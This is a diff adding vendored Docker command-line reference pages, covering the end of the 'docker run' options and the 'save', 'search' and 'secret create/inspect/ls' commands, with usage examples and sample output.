+    $ docker  run -w /path/to/dir/ -i -t  ubuntu pwd
+
+The `-w` lets the command being executed inside directory given, here
+`/path/to/dir/`. If the path does not exist it is created inside the container.
+
+### Set storage driver options per container
+
+    $ docker run -it --storage-opt size=120G fedora /bin/bash
+
+This (size) will allow to set the container rootfs size to 120G at creation time.
+This option is only available for the `devicemapper`, `btrfs`, `overlay2`,
+`windowsfilter` and `zfs` graph drivers.
+For the `devicemapper`, `btrfs`, `windowsfilter` and `zfs` graph drivers,
+user cannot pass a size less than the Default BaseFS Size.
+For the `overlay2` storage driver, the size option is only available if the
+backing fs is `xfs` and mounted with the `pquota` mount option.
+Under these conditions, user can pass any size less then the backing fs size.
+
+### Mount tmpfs (--tmpfs)
+
+    $ docker run -d --tmpfs /run:rw,noexec,nosuid,size=65536k my_image
+
+The `--tmpfs` flag mounts an empty tmpfs into the container with the `rw`,
+`noexec`, `nosuid`, `size=65536k` options.
+
+### Mount volume (-v, --read-only)
+
+    $ docker  run  -v `pwd`:`pwd` -w `pwd` -i -t  ubuntu pwd
+
+The `-v` flag mounts the current working directory into the container. The `-w`
+lets the command being executed inside the current working directory, by
+changing into the directory to the value returned by `pwd`. So this
+combination executes the command using the container, but inside the
+current working directory.
+
+    $ docker run -v /doesnt/exist:/foo -w /foo -i -t ubuntu bash
+
+When the host directory of a bind-mounted volume doesn't exist, Docker
+will automatically create this directory on the host for you. In the
+example above, Docker will create the `/doesnt/exist`
+folder before starting your container.
+
+    $ docker run --read-only -v /icanwrite busybox touch /icanwrite/here
+
+Volumes can be used in combination with `--read-only` to control where
+a container writes files. The `--read-only` flag mounts the container's root
+filesystem as read only prohibiting writes to locations other than the
+specified volumes for the container.
+
+    $ docker run -t -i -v /var/run/docker.sock:/var/run/docker.sock -v /path/to/static-docker-binary:/usr/bin/docker busybox sh
+
+By bind-mounting the docker unix socket and statically linked docker
+binary (refer to [get the linux binary](
+https://docs.docker.com/engine/installation/binaries/#/get-the-linux-binary)),
+you give the container the full access to create and manipulate the host's
+Docker daemon.
+
+On Windows, the paths must be specified using Windows-style semantics. 
+
+    PS C:\> docker run -v c:\foo:c:\dest microsoft/nanoserver cmd /s /c type c:\dest\somefile.txt
+    Contents of file
+	
+    PS C:\> docker run -v c:\foo:d: microsoft/nanoserver cmd /s /c type d:\somefile.txt
+    Contents of file
+
+The following examples will fail when using Windows-based containers, as the 
+destination of a volume or bind-mount inside the container must be one of: 
+a non-existing or empty directory; or a drive other than C:. Further, the source
+of a bind mount must be a local directory, not a file.
+
+    net use z: \\remotemachine\share
+    docker run -v z:\foo:c:\dest ...
+    docker run -v \\uncpath\to\directory:c:\dest ...
+    docker run -v c:\foo\somefile.txt:c:\dest ...
+    docker run -v c:\foo:c: ...
+    docker run -v c:\foo:c:\existing-directory-with-contents ...
+
+For in-depth information about volumes, refer to [manage data in containers](https://docs.docker.com/engine/tutorials/dockervolumes/)
+
+### Publish or expose port (-p, --expose)
+
+    $ docker run -p 127.0.0.1:80:8080 ubuntu bash
+
+This binds port `8080` of the container to port `80` on `127.0.0.1` of the host
+machine. The [Docker User
+Guide](https://docs.docker.com/engine/userguide/networking/default_network/dockerlinks/)
+explains in detail how to manipulate ports in Docker.
+
+    $ docker run --expose 80 ubuntu bash
+
+This exposes port `80` of the container without publishing the port to the host
+system's interfaces.
+
+### Set environment variables (-e, --env, --env-file)
+
+    $ docker run -e MYVAR1 --env MYVAR2=foo --env-file ./env.list ubuntu bash
+
+This sets simple (non-array) environmental variables in the container. For
+illustration all three
+flags are shown here. Where `-e`, `--env` take an environment variable and
+value, or if no `=` is provided, then that variable's current value, set via
+`export`, is passed through (i.e. `$MYVAR1` from the host is set to `$MYVAR1`
+in the container). When no `=` is provided and that variable is not defined
+in the client's environment then that variable will be removed from the
+container's list of environment variables. All three flags, `-e`, `--env` and
+`--env-file` can be repeated.
+
+Regardless of the order of these three flags, the `--env-file` are processed
+first, and then `-e`, `--env` flags. This way, the `-e` or `--env` will
+override variables as needed.
+
+    $ cat ./env.list
+    TEST_FOO=BAR
+    $ docker run --env TEST_FOO="This is a test" --env-file ./env.list busybox env | grep TEST_FOO
+    TEST_FOO=This is a test
+
+The `--env-file` flag takes a filename as an argument and expects each line
+to be in the `VAR=VAL` format, mimicking the argument passed to `--env`. Comment
+lines need only be prefixed with `#`
+
+An example of a file passed with `--env-file`
+
+    $ cat ./env.list
+    TEST_FOO=BAR
+
+    # this is a comment
+    TEST_APP_DEST_HOST=10.10.0.127
+    TEST_APP_DEST_PORT=8888
+    _TEST_BAR=FOO
+    TEST_APP_42=magic
+    helloWorld=true
+    123qwe=bar
+    org.spring.config=something
+
+    # pass through this variable from the caller
+    TEST_PASSTHROUGH
+    $ TEST_PASSTHROUGH=howdy docker run --env-file ./env.list busybox env
+    PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+    HOSTNAME=5198e0745561
+    TEST_FOO=BAR
+    TEST_APP_DEST_HOST=10.10.0.127
+    TEST_APP_DEST_PORT=8888
+    _TEST_BAR=FOO
+    TEST_APP_42=magic
+    helloWorld=true
+    TEST_PASSTHROUGH=howdy
+    HOME=/root
+    123qwe=bar
+    org.spring.config=something
+
+    $ docker run --env-file ./env.list busybox env
+    PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+    HOSTNAME=5198e0745561
+    TEST_FOO=BAR
+    TEST_APP_DEST_HOST=10.10.0.127
+    TEST_APP_DEST_PORT=8888
+    _TEST_BAR=FOO
+    TEST_APP_42=magic
+    helloWorld=true
+    TEST_PASSTHROUGH=
+    HOME=/root
+    123qwe=bar
+    org.spring.config=something
+
+### Set metadata on container (-l, --label, --label-file)
+
+A label is a `key=value` pair that applies metadata to a container. To label a container with two labels:
+
+    $ docker run -l my-label --label com.example.foo=bar ubuntu bash
+
+The `my-label` key doesn't specify a value so the label defaults to an empty
+string(`""`). To add multiple labels, repeat the label flag (`-l` or `--label`).
+
+The `key=value` must be unique to avoid overwriting the label value. If you
+specify labels with identical keys but different values, each subsequent value
+overwrites the previous. Docker uses the last `key=value` you supply.
+
+Use the `--label-file` flag to load multiple labels from a file. Delimit each
+label in the file with an EOL mark. The example below loads labels from a
+labels file in the current directory:
+
+    $ docker run --label-file ./labels ubuntu bash
+
+The label-file format is similar to the format for loading environment
+variables. (Unlike environment variables, labels are not visible to processes
+running inside a container.) The following example illustrates a label-file
+format:
+
+    com.example.label1="a label"
+
+    # this is a comment
+    com.example.label2=another\ label
+    com.example.label3
+
+You can load multiple label-files by supplying multiple  `--label-file` flags.
+
+For additional information on working with labels, see [*Labels - custom
+metadata in Docker*](https://docs.docker.com/engine/userguide/labels-custom-metadata/) in the Docker User
+Guide.
+
+### Connect a container to a network (--network)
+
+When you start a container use the `--network` flag to connect it to a network.
+This adds the `busybox` container to the `my-net` network.
+
+```bash
+$ docker run -itd --network=my-net busybox
+```
+
+You can also choose the IP addresses for the container with `--ip` and `--ip6`
+flags when you start the container on a user-defined network.
+
+```bash
+$ docker run -itd --network=my-net --ip=10.10.9.75 busybox
+```
+
+If you want to add a running container to a network use the `docker network connect` subcommand.
+
+You can connect multiple containers to the same network. Once connected, the
+containers can communicate easily need only another container's IP address
+or name. For `overlay` networks or custom plugins that support multi-host
+connectivity, containers connected to the same multi-host network but launched
+from different Engines can also communicate in this way.
+
+**Note**: Service discovery is unavailable on the default bridge network.
+Containers can communicate via their IP addresses by default. To communicate
+by name, they must be linked.
+
+You can disconnect a container from a network using the `docker network
+disconnect` command.
+
+### Mount volumes from container (--volumes-from)
+
+    $ docker run --volumes-from 777f7dc92da7 --volumes-from ba8c0c54f0f2:ro -i -t ubuntu pwd
+
+The `--volumes-from` flag mounts all the defined volumes from the referenced
+containers. Containers can be specified by repetitions of the `--volumes-from`
+argument. The container ID may be optionally suffixed with `:ro` or `:rw` to
+mount the volumes in read-only or read-write mode, respectively. By default,
+the volumes are mounted in the same mode (read write or read only) as
+the reference container.
+
+Labeling systems like SELinux require that proper labels are placed on volume
+content mounted into a container. Without a label, the security system might
+prevent the processes running inside the container from using the content. By
+default, Docker does not change the labels set by the OS.
+
+To change the label in the container context, you can add either of two suffixes
+`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file
+objects on the shared volumes. The `z` option tells Docker that two containers
+share the volume content. As a result, Docker labels the content with a shared
+content label. Shared volume labels allow all containers to read/write content.
+The `Z` option tells Docker to label the content with a private unshared label.
+Only the current container can use a private volume.
+
+### Attach to STDIN/STDOUT/STDERR (-a)
+
+The `-a` flag tells `docker run` to bind to the container's `STDIN`, `STDOUT`
+or `STDERR`. This makes it possible to manipulate the output and input as
+needed.
+
+    $ echo "test" | docker run -i -a stdin ubuntu cat -
+
+This pipes data into a container and prints the container's ID by attaching
+only to the container's `STDIN`.
+
+    $ docker run -a stderr ubuntu echo test
+
+This isn't going to print anything unless there's an error because we've
+only attached to the `STDERR` of the container. The container's logs
+still store what's been written to `STDERR` and `STDOUT`.
+
+    $ cat somefile | docker run -i -a stdin mybuilder dobuild
+
+This is how piping a file into a container could be done for a build.
+The container's ID will be printed after the build is done and the build
+logs could be retrieved using `docker logs`. This is
+useful if you need to pipe a file or something else into a container and
+retrieve the container's ID once the container has finished running.
+
+### Add host device to container (--device)
+
+    $ docker run --device=/dev/sdc:/dev/xvdc --device=/dev/sdd --device=/dev/zero:/dev/nulo -i -t ubuntu ls -l /dev/{xvdc,sdd,nulo}
+    brw-rw---- 1 root disk 8, 2 Feb  9 16:05 /dev/xvdc
+    brw-rw---- 1 root disk 8, 3 Feb  9 16:05 /dev/sdd
+    crw-rw-rw- 1 root root 1, 5 Feb  9 16:05 /dev/nulo
+
+It is often necessary to directly expose devices to a container. The `--device`
+option enables that. For example, a specific block storage device or loop
+device or audio device can be added to an otherwise unprivileged container
+(without the `--privileged` flag) and have the application directly access it.
+
+By default, the container will be able to `read`, `write` and `mknod` these devices.
+This can be overridden using a third `:rwm` set of options to each `--device`
+flag:
+
+
+    $ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk  /dev/xvdc
+
+    Command (m for help): q
+    $ docker run --device=/dev/sda:/dev/xvdc:r --rm -it ubuntu fdisk  /dev/xvdc
+    You will not be able to write the partition table.
+
+    Command (m for help): q
+
+    $ docker run --device=/dev/sda:/dev/xvdc:rw --rm -it ubuntu fdisk  /dev/xvdc
+
+    Command (m for help): q
+
+    $ docker run --device=/dev/sda:/dev/xvdc:m --rm -it ubuntu fdisk  /dev/xvdc
+    fdisk: unable to open /dev/xvdc: Operation not permitted
+
+> **Note:**
+> `--device` cannot be safely used with ephemeral devices. Block devices
+> that may be removed should not be added to untrusted containers with
+> `--device`.
+
+### Restart policies (--restart)
+
+Use Docker's `--restart` to specify a container's *restart policy*. A restart
+policy controls whether the Docker daemon restarts a container after exit.
+Docker supports the following restart policies:
+
+<table>
+  <thead>
+    <tr>
+      <th>Policy</th>
+      <th>Result</th>
+    </tr>
+  </thead>
+  <tbody>
+    <tr>
+      <td><strong>no</strong></td>
+      <td>
+        Do not automatically restart the container when it exits. This is the
+        default.
+      </td>
+    </tr>
+    <tr>
+      <td>
+        <span style="white-space: nowrap">
+          <strong>on-failure</strong>[:max-retries]
+        </span>
+      </td>
+      <td>
+        Restart only if the container exits with a non-zero exit status.
+        Optionally, limit the number of restart retries the Docker
+        daemon attempts.
+      </td>
+    </tr>
+    <tr>
+      <td><strong>always</strong></td>
+      <td>
+        Always restart the container regardless of the exit status.
+        When you specify always, the Docker daemon will try to restart
+        the container indefinitely. The container will also always start
+        on daemon startup, regardless of the current state of the container.
+      </td>
+    </tr>
+    <tr>
+      <td><strong>unless-stopped</strong></td>
+      <td>
+        Always restart the container regardless of the exit status, but
+        do not start it on daemon startup if the container has been put
+        to a stopped state before.
+      </td>
+    </tr>
+  </tbody>
+</table>
+
+    $ docker run --restart=always redis
+
+This will run the `redis` container with a restart policy of **always**
+so that if the container exits, Docker will restart it.
+
+More detailed information on restart policies can be found in the
+[Restart Policies (--restart)](../run.md#restart-policies-restart)
+section of the Docker run reference page.
+
+### Add entries to container hosts file (--add-host)
+
+You can add other hosts into a container's `/etc/hosts` file by using one or
+more `--add-host` flags. This example adds a static address for a host named
+`docker`:
+
+    $ docker run --add-host=docker:10.180.0.1 --rm -it debian
+    root@f38c87f2a42d:/# ping docker
+    PING docker (10.180.0.1): 48 data bytes
+    56 bytes from 10.180.0.1: icmp_seq=0 ttl=254 time=7.600 ms
+    56 bytes from 10.180.0.1: icmp_seq=1 ttl=254 time=30.705 ms
+    ^C--- docker ping statistics ---
+    2 packets transmitted, 2 packets received, 0% packet loss
+    round-trip min/avg/max/stddev = 7.600/19.152/30.705/11.553 ms
+
+Sometimes you need to connect to the Docker host from within your
+container. To enable this, pass the Docker host's IP address to
+the container using the `--add-host` flag. To find the host's address,
+use the `ip addr show` command.
+
+The flags you pass to `ip addr show` depend on whether you are
+using IPv4 or IPv6 networking in your containers. Use the following
+flags for IPv4 address retrieval for a network device named `eth0`:
+
+    $ HOSTIP=`ip -4 addr show scope global dev eth0 | grep inet | awk '{print \$2}' | cut -d / -f 1`
+    $ docker run  --add-host=docker:${HOSTIP} --rm -it debian
+
+For IPv6 use the `-6` flag instead of the `-4` flag. For other network
+devices, replace `eth0` with the correct device name (for example `docker0`
+for the bridge device).
+
+### Set ulimits in container (--ulimit)
+
+Since setting `ulimit` settings in a container requires extra privileges not
+available in the default container, you can set these using the `--ulimit` flag.
+`--ulimit` is specified with a soft and hard limit as such:
+`<type>=<soft limit>[:<hard limit>]`, for example:
+
+    $ docker run --ulimit nofile=1024:1024 --rm debian sh -c "ulimit -n"
+    1024
+
+> **Note:**
+> If you do not provide a `hard limit`, the `soft limit` will be used
+> for both values. If no `ulimits` are set, they will be inherited from
+> the default `ulimits` set on the daemon.  `as` option is disabled now.
+> In other words, the following script is not supported:
+> `$ docker run -it --ulimit as=1024 fedora /bin/bash`
+
+The values are sent to the appropriate `syscall` as they are set.
+Docker doesn't perform any byte conversion. Take this into account when setting the values.
+
+#### For `nproc` usage
+
+Be careful setting `nproc` with the `ulimit` flag as `nproc` is designed by Linux to set the
+maximum number of processes available to a user, not to a container.  For example, start four
+containers with `daemon` user:
+
+    docker run -d -u daemon --ulimit nproc=3 busybox top
+    docker run -d -u daemon --ulimit nproc=3 busybox top
+    docker run -d -u daemon --ulimit nproc=3 busybox top
+    docker run -d -u daemon --ulimit nproc=3 busybox top
+
+The 4th container fails and reports "[8] System error: resource temporarily unavailable" error.
+This fails because the caller set `nproc=3` resulting in the first three containers using up
+the three processes quota set for the `daemon` user.
+
+### Stop container with signal (--stop-signal)
+
+The `--stop-signal` flag sets the system call signal that will be sent to the container to exit.
+This signal can be a valid unsigned number that matches a position in the kernel's syscall table, for instance 9,
+or a signal name in the format SIGNAME, for instance SIGKILL.
+
+### Optional security options (--security-opt)
+
+On Windows, this flag can be used to specify the `credentialspec` option.
+The `credentialspec` must be in the format `file://spec.txt` or `registry://keyname`.
+
+### Stop container with timeout (--stop-timeout)
+
+The `--stop-timeout` flag sets the timeout (in seconds) that a pre-defined (see `--stop-signal`) system call
+signal that will be sent to the container to exit. After timeout elapses the container will be killed with SIGKILL.
+
+### Specify isolation technology for container (--isolation)
+
+This option is useful in situations where you are running Docker containers on
+Microsoft Windows. The `--isolation <value>` option sets a container's isolation
+technology. On Linux, the only supported is the `default` option which uses
+Linux namespaces. These two commands are equivalent on Linux:
+
+```
+$ docker run -d busybox top
+$ docker run -d --isolation default busybox top
+```
+
+On Microsoft Windows, can take any of these values:
+
+
+| Value     | Description                                                                                                                                                   |
+|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|
+| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value.  |
+| `process` | Namespace isolation only.                                                                                                                                     |
+| `hyperv`   | Hyper-V hypervisor partition-based isolation.                                                                                                                  |
+
+On Windows, the default isolation for client is `hyperv`, and for server is
+`process`. Therefore when running on Windows server without a `daemon` option
+set, these two commands are equivalent:
+```
+$ docker run -d --isolation default busybox top
+$ docker run -d --isolation process busybox top
+```
+
+If you have set the `--exec-opt isolation=hyperv` option on the Docker `daemon`,
+if running on Windows server, any of these commands also result in `hyperv` isolation:
+
+```
+$ docker run -d --isolation default busybox top
+$ docker run -d --isolation hyperv busybox top
+```
+
+### Configure namespaced kernel parameters (sysctls) at runtime
+
+The `--sysctl` sets namespaced kernel parameters (sysctls) in the
+container. For example, to turn on IP forwarding in the containers
+network namespace, run this command:
+
+    $ docker run --sysctl net.ipv4.ip_forward=1 someimage
+
+
+> **Note**: Not all sysctls are namespaced. Docker does not support changing sysctls
+> inside of a container that also modify the host system. As the kernel
+> evolves we expect to see more sysctls become namespaced.
+
+#### Currently supported sysctls
+
+  `IPC Namespace`:
+
+  kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced
+  Sysctls beginning with fs.mqueue.*
+
+  If you use the `--ipc=host` option these sysctls will not be allowed.
+
+  `Network Namespace`:
+      Sysctls beginning with net.*
+
+  If you use the `--network=host` option using these sysctls will not be allowed.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/save.md b/vendor/github.com/docker/docker/docs/reference/commandline/save.md
new file mode 100644
index 0000000000..88a5fed103
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/save.md
@@ -0,0 +1,45 @@
+---
+title: "save"
+description: "The save command description and usage"
+keywords: "tarred, repository, backup"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# save
+
+```markdown
+Usage:  docker save [OPTIONS] IMAGE [IMAGE...]
+
+Save one or more images to a tar archive (streamed to STDOUT by default)
+
+Options:
+      --help            Print usage
+  -o, --output string   Write to a file, instead of STDOUT
+```
+
+Produces a tarred repository to the standard output stream.
+Contains all parent layers, and all tags + versions, or specified `repo:tag`, for
+each argument provided.
+
+It is used to create a backup that can then be used with `docker load`
+
+    $ docker save busybox > busybox.tar
+    $ ls -sh busybox.tar
+    2.7M busybox.tar
+    $ docker save --output busybox.tar busybox
+    $ ls -sh busybox.tar
+    2.7M busybox.tar
+    $ docker save -o fedora-all.tar fedora
+    $ docker save -o fedora-latest.tar fedora:latest
+
+It is even useful to cherry-pick particular tags of an image repository
+
+    $ docker save -o ubuntu.tar ubuntu:lucid ubuntu:saucy
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/search.md b/vendor/github.com/docker/docker/docs/reference/commandline/search.md
new file mode 100644
index 0000000000..31faf37375
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/search.md
@@ -0,0 +1,134 @@
+---
+title: "search"
+description: "The search command description and usage"
+keywords: "search, hub, images"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# search
+
+```markdown
+Usage:  docker search [OPTIONS] TERM
+
+Search the Docker Hub for images
+
+Options:
+  -f, --filter value   Filter output based on conditions provided (default [])
+                       - is-automated=(true|false)
+                       - is-official=(true|false)
+                       - stars=<number> - image has at least 'number' stars
+      --help           Print usage
+      --limit int      Max number of search results (default 25)
+      --no-trunc       Don't truncate output
+```
+
+Search [Docker Hub](https://hub.docker.com) for images
+
+See [*Find Public Images on Docker Hub*](https://docs.docker.com/engine/tutorials/dockerrepos/#searching-for-images) for
+more details on finding shared images from the command line.
+
+> **Note:**
+> Search queries will only return up to 25 results
+
+## Examples
+
+### Search images by name
+
+This example displays images with a name containing 'busybox':
+
+    $ docker search busybox
+    NAME                             DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
+    busybox                          Busybox base image.                             316       [OK]       
+    progrium/busybox                                                                 50                   [OK]
+    radial/busyboxplus               Full-chain, Internet enabled, busybox made...   8                    [OK]
+    odise/busybox-python                                                             2                    [OK]
+    azukiapp/busybox                 This image is meant to be used as the base...   2                    [OK]
+    ofayau/busybox-jvm               Prepare busybox to install a 32 bits JVM.       1                    [OK]
+    shingonoide/archlinux-busybox    Arch Linux, a lightweight and flexible Lin...   1                    [OK]
+    odise/busybox-curl                                                               1                    [OK]
+    ofayau/busybox-libc32            Busybox with 32 bits (and 64 bits) libs         1                    [OK]
+    peelsky/zulu-openjdk-busybox                                                     1                    [OK]
+    skomma/busybox-data              Docker image suitable for data volume cont...   1                    [OK]
+    elektritter/busybox-teamspeak    Lightweight teamspeak3 container based on...    1                    [OK]
+    socketplane/busybox                                                              1                    [OK]
+    oveits/docker-nginx-busybox      This is a tiny NginX docker image based on...   0                    [OK]
+    ggtools/busybox-ubuntu           Busybox ubuntu version with extra goodies       0                    [OK]
+    nikfoundas/busybox-confd         Minimal busybox based distribution of confd     0                    [OK]
+    openshift/busybox-http-app                                                       0                    [OK]
+    jllopis/busybox                                                                  0                    [OK]
+    swyckoff/busybox                                                                 0                    [OK]
+    powellquiring/busybox                                                            0                    [OK]
+    williamyeh/busybox-sh            Docker image for BusyBox's sh                   0                    [OK]
+    simplexsys/busybox-cli-powered   Docker busybox images, with a few often us...   0                    [OK]
+    fhisamoto/busybox-java           Busybox java                                    0                    [OK]
+    scottabernethy/busybox                                                           0                    [OK]
+    marclop/busybox-solr
+
+### Display non-truncated description (--no-trunc)
+
+This example displays images with a name containing 'busybox',
+at least 3 stars and the description isn't truncated in the output:
+
+    $ docker search --stars=3 --no-trunc busybox
+    NAME                 DESCRIPTION                                                                               STARS     OFFICIAL   AUTOMATED
+    busybox              Busybox base image.                                                                       325       [OK]       
+    progrium/busybox                                                                                               50                   [OK]
+    radial/busyboxplus   Full-chain, Internet enabled, busybox made from scratch. Comes in git and cURL flavors.   8                    [OK]
+
+## Limit search results (--limit)
+
+The flag `--limit` is the maximum number of results returned by a search. This value could
+be in the range between 1 and 100. The default value of `--limit` is 25.
+
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there is more
+than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`)
+
+The currently supported filters are:
+
+* stars (int - number of stars the image has)
+* is-automated (true|false) - is the image automated or not
+* is-official (true|false) - is the image official or not
+
+
+### stars
+
+This example displays images with a name containing 'busybox' and at
+least 3 stars:
+
+    $ docker search --filter stars=3 busybox
+    NAME                 DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
+    busybox              Busybox base image.                             325       [OK]       
+    progrium/busybox                                                     50                   [OK]
+    radial/busyboxplus   Full-chain, Internet enabled, busybox made...   8                    [OK]
+
+
+### is-automated
+
+This example displays images with a name containing 'busybox'
+and are automated builds:
+
+    $ docker search --filter is-automated busybox
+    NAME                 DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
+    progrium/busybox                                                     50                   [OK]
+    radial/busyboxplus   Full-chain, Internet enabled, busybox made...   8                    [OK]
+
+### is-official
+
+This example displays images with a name containing 'busybox', at least
+3 stars and are official builds:
+
+    $ docker search --filter "is-official=true" --filter "stars=3" busybox
+    NAME                 DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
+    progrium/busybox                                                     50                   [OK]
+    radial/busyboxplus   Full-chain, Internet enabled, busybox made...   8                    [OK]
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md
new file mode 100644
index 0000000000..aebcebbcdd
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md
@@ -0,0 +1,90 @@
+---
+title: "secret create"
+description: "The secret create command description and usage"
+keywords: ["secret, create"]
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# secret create
+
+```Markdown
+Usage:	docker secret create [OPTIONS] SECRET file|-
+
+Create a secret from a file or STDIN as content
+
+Options:
+      --help          Print usage
+  -l, --label list    Secret labels (default [])
+```
+
+Creates a secret using standard input or from a file for the secret content. You must run this
+command on a manager node.
+
+## Examples
+
+### Create a secret
+
+```bash
+$ echo <secret> | docker secret create my_secret -
+mhv17xfe3gh6xc4rij5orpfds
+
+$ docker secret ls
+ID                          NAME                    CREATED                                   UPDATED                                   SIZE
+mhv17xfe3gh6xc4rij5orpfds   my_secret               2016-10-27 23:25:43.909181089 +0000 UTC   2016-10-27 23:25:43.909181089 +0000 UTC   1679
+```
+
+### Create a secret with a file
+
+```bash
+$ docker secret create my_secret ./secret.json
+mhv17xfe3gh6xc4rij5orpfds
+
+$ docker secret ls
+ID                          NAME                    CREATED                                   UPDATED                                   SIZE
+mhv17xfe3gh6xc4rij5orpfds   my_secret               2016-10-27 23:25:43.909181089 +0000 UTC   2016-10-27 23:25:43.909181089 +0000 UTC   1679
+```
+
+### Create a secret with labels
+
+```bash
+$ docker secret create --label env=dev --label rev=20161102 my_secret ./secret.json
+jtn7g6aukl5ky7nr9gvwafoxh
+
+$ docker secret inspect my_secret
+[
+    {
+        "ID": "jtn7g6aukl5ky7nr9gvwafoxh",
+        "Version": {
+            "Index": 541
+        },
+        "CreatedAt": "2016-11-03T20:54:12.924766548Z",
+        "UpdatedAt": "2016-11-03T20:54:12.924766548Z",
+        "Spec": {
+            "Name": "my_secret",
+            "Labels": {
+                "env": "dev",
+                "rev": "20161102"
+            },
+            "Data": null
+        },
+        "Digest": "sha256:4212a44b14e94154359569333d3fc6a80f6b9959dfdaff26412f4b2796b1f387",
+        "SecretSize": 1679
+    }
+]
+
+```
+
+
+## Related information
+
+* [secret inspect](secret_inspect.md)
+* [secret ls](secret_ls.md)
+* [secret rm](secret_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md
new file mode 100644
index 0000000000..de878f74e4
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md
@@ -0,0 +1,85 @@
+---
+title: "secret inspect"
+description: "The secret inspect command description and usage"
+keywords: ["secret, inspect"]
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# secret inspect
+
+```Markdown
+Usage:  docker secret inspect [OPTIONS] SECRET [SECRET...]
+
+Display detailed information on one or more secrets
+
+Options:
+  -f, --format string   Format the output using the given Go template
+      --help            Print usage
+```
+
+
+Inspects the specified secret. This command has to be run targeting a manager
+node.
+
+By default, this renders all results in a JSON array. If a format is specified,
+the given template will be executed for each result.
+
+Go's [text/template](http://golang.org/pkg/text/template/) package
+describes all the details of the format.
+
+## Examples
+
+### Inspecting a secret by name or ID
+
+You can inspect a secret, either by its *name*, or *ID*
+
+For example, given the following secret:
+
+```bash
+$ docker secret ls
+ID                          NAME                    CREATED                                   UPDATED
+mhv17xfe3gh6xc4rij5orpfds   secret.json             2016-10-27 23:25:43.909181089 +0000 UTC   2016-10-27 23:25:43.909181089 +0000 UTC
+```
+
+```bash
+$ docker secret inspect secret.json
+[
+    {
+        "ID": "mhv17xfe3gh6xc4rij5orpfds",
+            "Version": {
+            "Index": 1198
+        },
+        "CreatedAt": "2016-10-27T23:25:43.909181089Z",
+        "UpdatedAt": "2016-10-27T23:25:43.909181089Z",
+        "Spec": {
+            "Name": "secret.json"
+        }
+    }
+]
+```
+
+### Formatting secret output
+
+You can use the --format option to obtain specific information about a
+secret. The following example command outputs the creation time of the
+secret.
+
+```bash{% raw %}
+$ docker secret inspect --format='{{.CreatedAt}}' mhv17xfe3gh6xc4rij5orpfds
+2016-10-27 23:25:43.909181089 +0000 UTC
+{% endraw %}```
+
+
+## Related information
+
+* [secret create](secret_create.md)
+* [secret ls](secret_ls.md)
+* [secret rm](secret_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md
new file mode 100644
index 0000000000..6b34fc2146
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md
@@ -0,0 +1,43 @@
+---
+title: "secret ls"
+description: "The secret ls command description and usage"
+keywords: ["secret, ls"]
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# secret ls
+
+```Markdown
+Usage:	docker secret ls [OPTIONS]
+
+List secrets
+
+Aliases:
+  ls, list
+
+Options:
+  -q, --quiet          Only display IDs
+```
+
+Run this command on a manager node to list the secrets in the Swarm.
+
+## Examples
+
+```bash
+$ docker secret ls
+ID                          NAME                    CREATED                                   UPDATED
+mhv17xfe3gh6xc4rij5orpfds   secret.json             2016-10-27 23:25:43.909181089 +0000 UTC   2016-10-27 23:25:43.909181089 +0000 UTC
+```
+## Related information
+
+* [secret create](secret_create.md)
+* [secret inspect](secret_inspect.md)
+* [secret rm](secret_rm.md)
